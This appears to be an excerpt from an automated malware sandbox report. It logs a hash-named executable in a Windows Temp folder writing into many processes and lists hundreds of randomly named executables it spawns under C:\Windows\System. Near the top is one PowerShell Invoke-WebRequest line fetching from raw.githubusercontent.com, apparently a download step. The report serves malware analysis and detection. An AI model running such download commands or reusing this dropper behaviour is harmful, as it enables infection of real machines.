PID 3280 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\aGnqBQm.exe
PID 3280 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\aGnqBQm.exe
PID 3280 wrote to memory of 1332 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\ywMqHsX.exe
PID 3280 wrote to memory of 1332 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\ywMqHsX.exe
PID 3280 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\wGFQQMu.exe
PID 3280 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\wGFQQMu.exe
PID 3280 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\pGWkFmP.exe
PID 3280 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\pGWkFmP.exe
PID 3280 wrote to memory of 676 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\TRIFEVO.exe
PID 3280 wrote to memory of 676 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\TRIFEVO.exe
PID 3280 wrote to memory of 3736 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\zRdjWIB.exe
PID 3280 wrote to memory of 3736 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\zRdjWIB.exe
PID 3280 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\JWnEiLH.exe
PID 3280 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\JWnEiLH.exe
PID 3280 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\zIeGbca.exe
PID 3280 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\zIeGbca.exe
PID 3280 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\HFtCfxV.exe
PID 3280 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe C:\Windows\System\HFtCfxV.exe

Processes

C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe

"C:\Users\Admin\AppData\Local\Temp\15ca70b66d443ad16db13fab72d794f4f7859fe6c81f53f81ae62a1be11e0ff6.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\dekFayz.exe

C:\Windows\System\dekFayz.exe

C:\Windows\System\WaSMBHp.exe

C:\Windows\System\WaSMBHp.exe

C:\Windows\System\hGlZwCN.exe

C:\Windows\System\hGlZwCN.exe

C:\Windows\System\MHBleQE.exe

C:\Windows\System\MHBleQE.exe

C:\Windows\System\LoLEqyl.exe

C:\Windows\System\LoLEqyl.exe

C:\Windows\System\ytwlPrq.exe

C:\Windows\System\ytwlPrq.exe

C:\Windows\System\vapxwfh.exe

C:\Windows\System\vapxwfh.exe

C:\Windows\System\ayLcyMh.exe

C:\Windows\System\ayLcyMh.exe

C:\Windows\System\fgrtKfx.exe

C:\Windows\System\fgrtKfx.exe

C:\Windows\System\aafPeZy.exe

C:\Windows\System\aafPeZy.exe

C:\Windows\System\XmAibUO.exe

C:\Windows\System\XmAibUO.exe

C:\Windows\System\xbiLSzP.exe

C:\Windows\System\xbiLSzP.exe

C:\Windows\System\ybOctUF.exe

C:\Windows\System\ybOctUF.exe

C:\Windows\System\ummmPka.exe

C:\Windows\System\ummmPka.exe

C:\Windows\System\UTxxzDH.exe

C:\Windows\System\UTxxzDH.exe

C:\Windows\System\GJdWVCN.exe

C:\Windows\System\GJdWVCN.exe

C:\Windows\System\mKaqiDk.exe

C:\Windows\System\mKaqiDk.exe

C:\Windows\System\ziGqRsS.exe

C:\Windows\System\ziGqRsS.exe

C:\Windows\System\mGKGJjv.exe

C:\Windows\System\mGKGJjv.exe

C:\Windows\System\yLiJdvj.exe

C:\Windows\System\yLiJdvj.exe

C:\Windows\System\JTqtaXk.exe

C:\Windows\System\JTqtaXk.exe

C:\Windows\System\OIUAimD.exe

C:\Windows\System\OIUAimD.exe

C:\Windows\System\aGnqBQm.exe

C:\Windows\System\aGnqBQm.exe

C:\Windows\System\ywMqHsX.exe

C:\Windows\System\ywMqHsX.exe

C:\Windows\System\wGFQQMu.exe

C:\Windows\System\wGFQQMu.exe

C:\Windows\System\pGWkFmP.exe

C:\Windows\System\pGWkFmP.exe

C:\Windows\System\TRIFEVO.exe

C:\Windows\System\TRIFEVO.exe

C:\Windows\System\zRdjWIB.exe

C:\Windows\System\zRdjWIB.exe

C:\Windows\System\JWnEiLH.exe

C:\Windows\System\JWnEiLH.exe

C:\Windows\System\zIeGbca.exe

C:\Windows\System\zIeGbca.exe

C:\Windows\System\HFtCfxV.exe

C:\Windows\System\HFtCfxV.exe

C:\Windows\System\sCBvpsg.exe

C:\Windows\System\sCBvpsg.exe

C:\Windows\System\IJGzTPM.exe

C:\Windows\System\IJGzTPM.exe

C:\Windows\System\pjAYEpB.exe

C:\Windows\System\pjAYEpB.exe

C:\Windows\System\cXMdQND.exe

C:\Windows\System\cXMdQND.exe

C:\Windows\System\TgjMzCg.exe

C:\Windows\System\TgjMzCg.exe

C:\Windows\System\sVKlkFy.exe

C:\Windows\System\sVKlkFy.exe

C:\Windows\System\UIdOQVF.exe

C:\Windows\System\UIdOQVF.exe

C:\Windows\System\NMsEiji.exe

C:\Windows\System\NMsEiji.exe

C:\Windows\System\mZApmKJ.exe

C:\Windows\System\mZApmKJ.exe

C:\Windows\System\qtnlkHL.exe

C:\Windows\System\qtnlkHL.exe

C:\Windows\System\ifdjeKE.exe

C:\Windows\System\ifdjeKE.exe

C:\Windows\System\IzNMtHC.exe

C:\Windows\System\IzNMtHC.exe

C:\Windows\System\yHvyUpJ.exe

C:\Windows\System\yHvyUpJ.exe

C:\Windows\System\ZrLCwWl.exe

C:\Windows\System\ZrLCwWl.exe

C:\Windows\System\FEBDcIm.exe

C:\Windows\System\FEBDcIm.exe

C:\Windows\System\AhYStJy.exe

C:\Windows\System\AhYStJy.exe

C:\Windows\System\dywivGJ.exe

C:\Windows\System\dywivGJ.exe

C:\Windows\System\NCuxfsF.exe

C:\Windows\System\NCuxfsF.exe

C:\Windows\System\mvgAMak.exe

C:\Windows\System\mvgAMak.exe

C:\Windows\System\OYJUGKc.exe

C:\Windows\System\OYJUGKc.exe

C:\Windows\System\JNqNXxo.exe

C:\Windows\System\JNqNXxo.exe

C:\Windows\System\sQqvxeE.exe

C:\Windows\System\sQqvxeE.exe

C:\Windows\System\DoylLfV.exe

C:\Windows\System\DoylLfV.exe

C:\Windows\System\beWuCxU.exe

C:\Windows\System\beWuCxU.exe

C:\Windows\System\aWcYzbp.exe

C:\Windows\System\aWcYzbp.exe

C:\Windows\System\bbvzrQb.exe

C:\Windows\System\bbvzrQb.exe

C:\Windows\System\iuckmmz.exe

C:\Windows\System\iuckmmz.exe

C:\Windows\System\rhYKiKB.exe

C:\Windows\System\rhYKiKB.exe

C:\Windows\System\glLdtNv.exe

C:\Windows\System\glLdtNv.exe

C:\Windows\System\PCgwKkO.exe

C:\Windows\System\PCgwKkO.exe

C:\Windows\System\QXhIKRE.exe

C:\Windows\System\QXhIKRE.exe

C:\Windows\System\ftAEUYb.exe

C:\Windows\System\ftAEUYb.exe

C:\Windows\System\YeRXevo.exe

C:\Windows\System\YeRXevo.exe

C:\Windows\System\TeEPFpO.exe

C:\Windows\System\TeEPFpO.exe

C:\Windows\System\oibFIbu.exe

C:\Windows\System\oibFIbu.exe

C:\Windows\System\oFPVJLZ.exe

C:\Windows\System\oFPVJLZ.exe

C:\Windows\System\tfNQZlE.exe

C:\Windows\System\tfNQZlE.exe

C:\Windows\System\lHctifv.exe

C:\Windows\System\lHctifv.exe

C:\Windows\System\vrtIrzQ.exe

C:\Windows\System\vrtIrzQ.exe

C:\Windows\System\UUWrgnG.exe

C:\Windows\System\UUWrgnG.exe

C:\Windows\System\VrGPCrk.exe

C:\Windows\System\VrGPCrk.exe

C:\Windows\System\pKXiZKB.exe

C:\Windows\System\pKXiZKB.exe

C:\Windows\System\sTRENVr.exe

C:\Windows\System\sTRENVr.exe

C:\Windows\System\gBoceJq.exe

C:\Windows\System\gBoceJq.exe

C:\Windows\System\HdTNmEO.exe

C:\Windows\System\HdTNmEO.exe

C:\Windows\System\ExBAVMa.exe

C:\Windows\System\ExBAVMa.exe

C:\Windows\System\JoSHmrg.exe

C:\Windows\System\JoSHmrg.exe

C:\Windows\System\ekDTJPb.exe

C:\Windows\System\ekDTJPb.exe

C:\Windows\System\RZNDIHD.exe

C:\Windows\System\RZNDIHD.exe

C:\Windows\System\eXQPfIQ.exe

C:\Windows\System\eXQPfIQ.exe

C:\Windows\System\LAMnaNU.exe

C:\Windows\System\LAMnaNU.exe

C:\Windows\System\BdDPPen.exe

C:\Windows\System\BdDPPen.exe

C:\Windows\System\yBpFDDu.exe

C:\Windows\System\yBpFDDu.exe

C:\Windows\System\AAzWvFW.exe

C:\Windows\System\AAzWvFW.exe

C:\Windows\System\IxWtvAm.exe

C:\Windows\System\IxWtvAm.exe

C:\Windows\System\iRmjAQY.exe

C:\Windows\System\iRmjAQY.exe

C:\Windows\System\HXsFdBb.exe

C:\Windows\System\HXsFdBb.exe

C:\Windows\System\tpLhOLI.exe

C:\Windows\System\tpLhOLI.exe

C:\Windows\System\OqGLbcK.exe

C:\Windows\System\OqGLbcK.exe

C:\Windows\System\qLmpSMN.exe

C:\Windows\System\qLmpSMN.exe

C:\Windows\System\XgrURgS.exe

C:\Windows\System\XgrURgS.exe

C:\Windows\System\ZjPwdEu.exe

C:\Windows\System\ZjPwdEu.exe

C:\Windows\System\MLPqtzC.exe

C:\Windows\System\MLPqtzC.exe

C:\Windows\System\HvQTCLO.exe

C:\Windows\System\HvQTCLO.exe

C:\Windows\System\LXpnapr.exe

C:\Windows\System\LXpnapr.exe

C:\Windows\System\HfuEQsD.exe

C:\Windows\System\HfuEQsD.exe

C:\Windows\System\xiphldj.exe

C:\Windows\System\xiphldj.exe

C:\Windows\System\RcuXsaX.exe

C:\Windows\System\RcuXsaX.exe

C:\Windows\System\suqaDJc.exe

C:\Windows\System\suqaDJc.exe

C:\Windows\System\ypxvEBn.exe

C:\Windows\System\ypxvEBn.exe

C:\Windows\System\yzyDeLT.exe

C:\Windows\System\yzyDeLT.exe

C:\Windows\System\heyPKkJ.exe

C:\Windows\System\heyPKkJ.exe

C:\Windows\System\wYjLdpS.exe

C:\Windows\System\wYjLdpS.exe

C:\Windows\System\vXIuvPF.exe

C:\Windows\System\vXIuvPF.exe

C:\Windows\System\IRSFyIE.exe

C:\Windows\System\IRSFyIE.exe

C:\Windows\System\YzIDspO.exe

C:\Windows\System\YzIDspO.exe

C:\Windows\System\TFVpfbS.exe

C:\Windows\System\TFVpfbS.exe

C:\Windows\System\dRWhPeY.exe

C:\Windows\System\dRWhPeY.exe

C:\Windows\System\PFWcyFP.exe

C:\Windows\System\PFWcyFP.exe

C:\Windows\System\HABjYXr.exe

C:\Windows\System\HABjYXr.exe

C:\Windows\System\vOuordr.exe

C:\Windows\System\vOuordr.exe

C:\Windows\System\NMTvGQJ.exe

C:\Windows\System\NMTvGQJ.exe

C:\Windows\System\QsKFPaU.exe

C:\Windows\System\QsKFPaU.exe

C:\Windows\System\fOCcONw.exe

C:\Windows\System\fOCcONw.exe

C:\Windows\System\ytMrDdT.exe

C:\Windows\System\ytMrDdT.exe

C:\Windows\System\OlqhXxR.exe

C:\Windows\System\OlqhXxR.exe

C:\Windows\System\Wjgsrso.exe

C:\Windows\System\Wjgsrso.exe

C:\Windows\System\ZAaDJFG.exe

C:\Windows\System\ZAaDJFG.exe

C:\Windows\System\ygQipvX.exe

C:\Windows\System\ygQipvX.exe

C:\Windows\System\iFRndfE.exe

C:\Windows\System\iFRndfE.exe

C:\Windows\System\PfPEcpl.exe

C:\Windows\System\PfPEcpl.exe

C:\Windows\System\aIZoheH.exe

C:\Windows\System\aIZoheH.exe

C:\Windows\System\kDvuzaq.exe

C:\Windows\System\kDvuzaq.exe

C:\Windows\System\FaMbDBW.exe

C:\Windows\System\FaMbDBW.exe

C:\Windows\System\wJgszpP.exe

C:\Windows\System\wJgszpP.exe

C:\Windows\System\XHajisx.exe

C:\Windows\System\XHajisx.exe

C:\Windows\System\zjgJXlu.exe

C:\Windows\System\zjgJXlu.exe

C:\Windows\System\jeASQIh.exe

C:\Windows\System\jeASQIh.exe

C:\Windows\System\OLUkAuV.exe

C:\Windows\System\OLUkAuV.exe

C:\Windows\System\jVFGMcD.exe

C:\Windows\System\jVFGMcD.exe

C:\Windows\System\IrQAPep.exe

C:\Windows\System\IrQAPep.exe

C:\Windows\System\ivOoDUH.exe

C:\Windows\System\ivOoDUH.exe

C:\Windows\System\JzlvKMS.exe

C:\Windows\System\JzlvKMS.exe

C:\Windows\System\OVlKEtr.exe

C:\Windows\System\OVlKEtr.exe

C:\Windows\System\RZxBLey.exe

C:\Windows\System\RZxBLey.exe

C:\Windows\System\ZUCsXfu.exe

C:\Windows\System\ZUCsXfu.exe

C:\Windows\System\xpIjVUq.exe

C:\Windows\System\xpIjVUq.exe

C:\Windows\System\AdKpSFm.exe

C:\Windows\System\AdKpSFm.exe

C:\Windows\System\qiykVSN.exe

C:\Windows\System\qiykVSN.exe

C:\Windows\System\WpsVCEq.exe

C:\Windows\System\WpsVCEq.exe

C:\Windows\System\GeYYcoP.exe

C:\Windows\System\GeYYcoP.exe

C:\Windows\System\eZojqLw.exe

C:\Windows\System\eZojqLw.exe

C:\Windows\System\zZJudfY.exe

C:\Windows\System\zZJudfY.exe

C:\Windows\System\biQnkSo.exe

C:\Windows\System\biQnkSo.exe

C:\Windows\System\TcyfIpS.exe

C:\Windows\System\TcyfIpS.exe

C:\Windows\System\MqgjudZ.exe

C:\Windows\System\MqgjudZ.exe

C:\Windows\System\wuuctxq.exe

C:\Windows\System\wuuctxq.exe

C:\Windows\System\DNVsdiv.exe

C:\Windows\System\DNVsdiv.exe

C:\Windows\System\nSDzpXp.exe

C:\Windows\System\nSDzpXp.exe

C:\Windows\System\TrbJDpI.exe

C:\Windows\System\TrbJDpI.exe

C:\Windows\System\UPZvVsr.exe

C:\Windows\System\UPZvVsr.exe

C:\Windows\System\DXbhcXb.exe

C:\Windows\System\DXbhcXb.exe

C:\Windows\System\PEXzCBU.exe

C:\Windows\System\PEXzCBU.exe

C:\Windows\System\FHaTiVj.exe

C:\Windows\System\FHaTiVj.exe

C:\Windows\System\pNkFrKg.exe

C:\Windows\System\pNkFrKg.exe

C:\Windows\System\cwrWZkg.exe

C:\Windows\System\cwrWZkg.exe

C:\Windows\System\bpPKqLv.exe

C:\Windows\System\bpPKqLv.exe

C:\Windows\System\sThMaak.exe

C:\Windows\System\sThMaak.exe

C:\Windows\System\PwpVxxU.exe

C:\Windows\System\PwpVxxU.exe

C:\Windows\System\kMdYliT.exe

C:\Windows\System\kMdYliT.exe

C:\Windows\System\lGjPQLQ.exe

C:\Windows\System\lGjPQLQ.exe

C:\Windows\System\FPREJtr.exe

C:\Windows\System\FPREJtr.exe

C:\Windows\System\UvMULtJ.exe

C:\Windows\System\UvMULtJ.exe

C:\Windows\System\baJvCDG.exe

C:\Windows\System\baJvCDG.exe

C:\Windows\System\dBRhTrS.exe

C:\Windows\System\dBRhTrS.exe

C:\Windows\System\GiPdlmI.exe

C:\Windows\System\GiPdlmI.exe

C:\Windows\System\ZpyDRwI.exe

C:\Windows\System\ZpyDRwI.exe

C:\Windows\System\BMInhEQ.exe

C:\Windows\System\BMInhEQ.exe

C:\Windows\System\ZgrFmJO.exe

C:\Windows\System\ZgrFmJO.exe

C:\Windows\System\QcbZJPl.exe

C:\Windows\System\QcbZJPl.exe

C:\Windows\System\FxJnuZT.exe

C:\Windows\System\FxJnuZT.exe

C:\Windows\System\cvGNnJh.exe

C:\Windows\System\cvGNnJh.exe

C:\Windows\System\KeupQyM.exe

C:\Windows\System\KeupQyM.exe

C:\Windows\System\Uzstreg.exe

C:\Windows\System\Uzstreg.exe

C:\Windows\System\NLtQhDP.exe

C:\Windows\System\NLtQhDP.exe

C:\Windows\System\gBOeRAm.exe

C:\Windows\System\gBOeRAm.exe

C:\Windows\System\Wjlbtuu.exe

C:\Windows\System\Wjlbtuu.exe

C:\Windows\System\AdEPYPz.exe

C:\Windows\System\AdEPYPz.exe

C:\Windows\System\RYBVaZf.exe

C:\Windows\System\RYBVaZf.exe

C:\Windows\System\BXSoqnp.exe

C:\Windows\System\BXSoqnp.exe

C:\Windows\System\LJYQiyI.exe

C:\Windows\System\LJYQiyI.exe

C:\Windows\System\tdoIjvL.exe

C:\Windows\System\tdoIjvL.exe

C:\Windows\System\YjtPfqb.exe

C:\Windows\System\YjtPfqb.exe

C:\Windows\System\PnzrjDJ.exe

C:\Windows\System\PnzrjDJ.exe

C:\Windows\System\blaNIgr.exe

C:\Windows\System\blaNIgr.exe

C:\Windows\System\ZkvLJVM.exe

C:\Windows\System\ZkvLJVM.exe

C:\Windows\System\YoFzJku.exe

C:\Windows\System\YoFzJku.exe

C:\Windows\System\yahIelJ.exe

C:\Windows\System\yahIelJ.exe

C:\Windows\System\qblwkdu.exe

C:\Windows\System\qblwkdu.exe

C:\Windows\System\JVPWrGX.exe

C:\Windows\System\JVPWrGX.exe

C:\Windows\System\aeOwvHy.exe

C:\Windows\System\aeOwvHy.exe

C:\Windows\System\xhyIDpt.exe

C:\Windows\System\xhyIDpt.exe

C:\Windows\System\QCmdVAj.exe

C:\Windows\System\QCmdVAj.exe

C:\Windows\System\FKwRMvE.exe

C:\Windows\System\FKwRMvE.exe

C:\Windows\System\MWdQcNS.exe

C:\Windows\System\MWdQcNS.exe

C:\Windows\System\ElIViwh.exe

C:\Windows\System\ElIViwh.exe

C:\Windows\System\ZPQXFyZ.exe

C:\Windows\System\ZPQXFyZ.exe

C:\Windows\System\ihXIHEZ.exe

C:\Windows\System\ihXIHEZ.exe

C:\Windows\System\jIlADfa.exe

C:\Windows\System\jIlADfa.exe

C:\Windows\System\rUXtmIH.exe

C:\Windows\System\rUXtmIH.exe

C:\Windows\System\vhnwSjE.exe

C:\Windows\System\vhnwSjE.exe

C:\Windows\System\vfYwAIg.exe

C:\Windows\System\vfYwAIg.exe

C:\Windows\System\kmAqYFd.exe

C:\Windows\System\kmAqYFd.exe

C:\Windows\System\XSENmyg.exe

C:\Windows\System\XSENmyg.exe

C:\Windows\System\YuExGei.exe

C:\Windows\System\YuExGei.exe

C:\Windows\System\UtjWfNp.exe

C:\Windows\System\UtjWfNp.exe

C:\Windows\System\pDGjMrz.exe

C:\Windows\System\pDGjMrz.exe

C:\Windows\System\HhakRCW.exe

C:\Windows\System\HhakRCW.exe

C:\Windows\System\nptRowS.exe

C:\Windows\System\nptRowS.exe

C:\Windows\System\nLvpjHp.exe

C:\Windows\System\nLvpjHp.exe

C:\Windows\System\ILGkCkK.exe

C:\Windows\System\ILGkCkK.exe

C:\Windows\System\McMxltO.exe

C:\Windows\System\McMxltO.exe

C:\Windows\System\tBmYGUx.exe

C:\Windows\System\tBmYGUx.exe

C:\Windows\System\FUGeFrk.exe

C:\Windows\System\FUGeFrk.exe

C:\Windows\System\hYSTTDQ.exe

C:\Windows\System\hYSTTDQ.exe

C:\Windows\System\XByJdEy.exe

C:\Windows\System\XByJdEy.exe

C:\Windows\System\jDQqPGh.exe

C:\Windows\System\jDQqPGh.exe

C:\Windows\System\fwuHviY.exe

C:\Windows\System\fwuHviY.exe

C:\Windows\System\pWrLhUq.exe

C:\Windows\System\pWrLhUq.exe

C:\Windows\System\frlnark.exe

C:\Windows\System\frlnark.exe

C:\Windows\System\YKxyacQ.exe

C:\Windows\System\YKxyacQ.exe

C:\Windows\System\TDExoae.exe

C:\Windows\System\TDExoae.exe

C:\Windows\System\aPiGtkU.exe

C:\Windows\System\aPiGtkU.exe

C:\Windows\System\HxKdFuD.exe

C:\Windows\System\HxKdFuD.exe

C:\Windows\System\MbVrMtI.exe

C:\Windows\System\MbVrMtI.exe

C:\Windows\System\enAWRIZ.exe

C:\Windows\System\enAWRIZ.exe

C:\Windows\System\BjduWzP.exe

C:\Windows\System\BjduWzP.exe

C:\Windows\System\wIWaCxA.exe

C:\Windows\System\wIWaCxA.exe

C:\Windows\System\qXzCMvZ.exe

C:\Windows\System\qXzCMvZ.exe

C:\Windows\System\RuqnAKE.exe

C:\Windows\System\RuqnAKE.exe

C:\Windows\System\diPejJS.exe

C:\Windows\System\diPejJS.exe

C:\Windows\System\poCZwrc.exe

C:\Windows\System\poCZwrc.exe

C:\Windows\System\yIpYBFz.exe

C:\Windows\System\yIpYBFz.exe

C:\Windows\System\LmzhALG.exe

C:\Windows\System\LmzhALG.exe

C:\Windows\System\RYEdtxy.exe

C:\Windows\System\RYEdtxy.exe

C:\Windows\System\DeHApfx.exe

C:\Windows\System\DeHApfx.exe

C:\Windows\System\fWEnuVZ.exe

C:\Windows\System\fWEnuVZ.exe

C:\Windows\System\SUvWazJ.exe

C:\Windows\System\SUvWazJ.exe

C:\Windows\System\DxwKpkp.exe

C:\Windows\System\DxwKpkp.exe

C:\Windows\System\sFUJTCL.exe

C:\Windows\System\sFUJTCL.exe

C:\Windows\System\jScYgwY.exe

C:\Windows\System\jScYgwY.exe

C:\Windows\System\cBXIYNR.exe

C:\Windows\System\cBXIYNR.exe

C:\Windows\System\NyAfavU.exe

C:\Windows\System\NyAfavU.exe

C:\Windows\System\SLryXso.exe

C:\Windows\System\SLryXso.exe

C:\Windows\System\FambdFh.exe

C:\Windows\System\FambdFh.exe

C:\Windows\System\yCxCNqi.exe

C:\Windows\System\yCxCNqi.exe

C:\Windows\System\rjHWgUq.exe

C:\Windows\System\rjHWgUq.exe

C:\Windows\System\NMLIvhC.exe

C:\Windows\System\NMLIvhC.exe

C:\Windows\System\fwCVyKm.exe

C:\Windows\System\fwCVyKm.exe

C:\Windows\System\UyywTzM.exe

C:\Windows\System\UyywTzM.exe

C:\Windows\System\vISEiXv.exe

C:\Windows\System\vISEiXv.exe

C:\Windows\System\XETvCYi.exe

C:\Windows\System\XETvCYi.exe

C:\Windows\System\evsYtDO.exe

C:\Windows\System\evsYtDO.exe

C:\Windows\System\xnKdDMK.exe

C:\Windows\System\xnKdDMK.exe

C:\Windows\System\lZWSsUi.exe

C:\Windows\System\lZWSsUi.exe

C:\Windows\System\lLGvRTB.exe

C:\Windows\System\lLGvRTB.exe

C:\Windows\System\JuZxhqI.exe

C:\Windows\System\JuZxhqI.exe

C:\Windows\System\TQUjepf.exe

C:\Windows\System\TQUjepf.exe

C:\Windows\System\uYtctNs.exe

C:\Windows\System\uYtctNs.exe

C:\Windows\System\wvDFaHe.exe

C:\Windows\System\wvDFaHe.exe

C:\Windows\System\jZtqgKt.exe

C:\Windows\System\jZtqgKt.exe

C:\Windows\System\QhszqcH.exe

C:\Windows\System\QhszqcH.exe

C:\Windows\System\yQqdoAp.exe

C:\Windows\System\yQqdoAp.exe

C:\Windows\System\aoiHjjl.exe

C:\Windows\System\aoiHjjl.exe

C:\Windows\System\wVHIStM.exe

C:\Windows\System\wVHIStM.exe

C:\Windows\System\PSWhQGM.exe

C:\Windows\System\PSWhQGM.exe

C:\Windows\System\HFEkihG.exe

C:\Windows\System\HFEkihG.exe

C:\Windows\System\EIlbqoO.exe

C:\Windows\System\EIlbqoO.exe

C:\Windows\System\YRQqIqG.exe

C:\Windows\System\YRQqIqG.exe

C:\Windows\System\bEBpwgT.exe

C:\Windows\System\bEBpwgT.exe

C:\Windows\System\PxnuQFd.exe

C:\Windows\System\PxnuQFd.exe

C:\Windows\System\YGnFdGr.exe

C:\Windows\System\YGnFdGr.exe

C:\Windows\System\WiJNmjA.exe

C:\Windows\System\WiJNmjA.exe

C:\Windows\System\xWBppok.exe

C:\Windows\System\xWBppok.exe

C:\Windows\System\lHshUhf.exe

C:\Windows\System\lHshUhf.exe

C:\Windows\System\yAfgnsU.exe

C:\Windows\System\yAfgnsU.exe

C:\Windows\System\EYImDNq.exe

C:\Windows\System\EYImDNq.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4532,i,2029050989380753659,15333598055019363793,262144 --variations-seed-version --mojo-platform-channel-handle=1044 /prefetch:8

C:\Windows\System\RwJgDyR.exe

C:\Windows\System\RwJgDyR.exe

C:\Windows\System\pPUhqkV.exe

C:\Windows\System\pPUhqkV.exe

C:\Windows\System\YNjuayS.exe

C:\Windows\System\YNjuayS.exe

C:\Windows\System\TejLWFs.exe

C:\Windows\System\TejLWFs.exe

C:\Windows\System\ayaCqur.exe

C:\Windows\System\ayaCqur.exe

C:\Windows\System\OGxQigp.exe

C:\Windows\System\OGxQigp.exe

C:\Windows\System\mErBuKL.exe

C:\Windows\System\mErBuKL.exe

C:\Windows\System\TCeTnvG.exe

C:\Windows\System\TCeTnvG.exe

C:\Windows\System\QFjrDbJ.exe

C:\Windows\System\QFjrDbJ.exe

C:\Windows\System\YvoYTGH.exe

C:\Windows\System\YvoYTGH.exe

C:\Windows\System\jUmqFmM.exe

C:\Windows\System\jUmqFmM.exe

C:\Windows\System\HlwyHSW.exe

C:\Windows\System\HlwyHSW.exe

C:\Windows\System\KkczCKG.exe

C:\Windows\System\KkczCKG.exe

C:\Windows\System\jnkwNRh.exe

C:\Windows\System\jnkwNRh.exe

C:\Windows\System\MfzaPVM.exe

C:\Windows\System\MfzaPVM.exe

C:\Windows\System\YLAIdhh.exe

C:\Windows\System\YLAIdhh.exe

C:\Windows\System\SZgqHmB.exe

C:\Windows\System\SZgqHmB.exe

C:\Windows\System\xZArLWG.exe

C:\Windows\System\xZArLWG.exe

C:\Windows\System\rzzqFKE.exe

C:\Windows\System\rzzqFKE.exe

C:\Windows\System\bJXkBRj.exe

C:\Windows\System\bJXkBRj.exe

C:\Windows\System\qJsXAPq.exe

C:\Windows\System\qJsXAPq.exe

C:\Windows\System\DHmjzGN.exe

C:\Windows\System\DHmjzGN.exe

C:\Windows\System\KGYNdQr.exe

C:\Windows\System\KGYNdQr.exe

C:\Windows\System\mlgIPtw.exe

C:\Windows\System\mlgIPtw.exe

C:\Windows\System\qMkPAIH.exe

C:\Windows\System\qMkPAIH.exe

C:\Windows\System\UcceuQy.exe

C:\Windows\System\UcceuQy.exe

C:\Windows\System\mJNkFhl.exe

C:\Windows\System\mJNkFhl.exe

C:\Windows\System\YmpDgSY.exe

C:\Windows\System\YmpDgSY.exe

C:\Windows\System\kKGPVWK.exe

C:\Windows\System\kKGPVWK.exe

C:\Windows\System\bkCFUGV.exe

C:\Windows\System\bkCFUGV.exe

C:\Windows\System\gPVGmJR.exe

C:\Windows\System\gPVGmJR.exe

C:\Windows\System\ZmIjLBC.exe

C:\Windows\System\ZmIjLBC.exe

C:\Windows\System\xqBTmVd.exe

C:\Windows\System\xqBTmVd.exe

C:\Windows\System\doVHKJg.exe

C:\Windows\System\doVHKJg.exe

C:\Windows\System\iIBIkMp.exe

C:\Windows\System\iIBIkMp.exe

C:\Windows\System\rpezOXd.exe

C:\Windows\System\rpezOXd.exe

C:\Windows\System\ucAwTBT.exe

C:\Windows\System\ucAwTBT.exe

C:\Windows\System\DvhmDDM.exe

C:\Windows\System\DvhmDDM.exe

C:\Windows\System\MPRBFyf.exe

C:\Windows\System\MPRBFyf.exe

C:\Windows\System\jHfltOu.exe

C:\Windows\System\jHfltOu.exe

C:\Windows\System\zTTlDcN.exe

C:\Windows\System\zTTlDcN.exe

C:\Windows\System\fFCpiYw.exe

C:\Windows\System\fFCpiYw.exe

C:\Windows\System\KwxKrea.exe

C:\Windows\System\KwxKrea.exe

